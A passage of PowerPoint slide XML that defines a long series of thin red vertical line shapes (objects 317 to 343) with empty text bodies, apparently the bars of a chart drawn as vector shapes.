            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160135"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="object 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178417" y="5666636"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="163138"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="object 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5198251" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="object 319"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5198251" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="object 320"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5218084" y="5652946"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="object 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5218084" y="5649973"/>
            <a:ext cx="0" cy="341012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171546"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="object 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238316" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="object 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238316" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="object 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258149" y="5636291"/>
            <a:ext cx="0" cy="351079"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="177164">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="176949"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="object 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258149" y="5633316"/>
            <a:ext cx="0" cy="357371"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="180339">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="179951"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="object 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5277983" y="5825107"/>
            <a:ext cx="0" cy="162327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="81914">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="81667"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="object 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5277983" y="5822129"/>
            <a:ext cx="0" cy="168619"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="85089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="84670"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="object 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5297815" y="5664058"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="162937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="object 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5297815" y="5661083"/>
            <a:ext cx="0" cy="329687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="166369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165940"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="object 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317650" y="5791781"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98484"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="object 331"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317650" y="5788806"/>
            <a:ext cx="0" cy="201336"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="101600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="101487"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="object 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5337482" y="5664058"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="162937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="object 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5337482" y="5661083"/>
            <a:ext cx="0" cy="329687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="166369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165940"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="object 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357317" y="5730695"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="object 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357317" y="5727720"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132312"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="object 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377149" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="object 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377149" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="object 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5396983" y="5764014"/>
            <a:ext cx="0" cy="223986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="113030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="112496"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="object 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5396983" y="5761039"/>
            <a:ext cx="0" cy="229019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="115569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="115499"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="object 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416816" y="5664058"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="162937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="object 341"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416816" y="5661083"/>
            <a:ext cx="0" cy="329687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="166369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165940"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="object 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436648" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="object 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436648" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
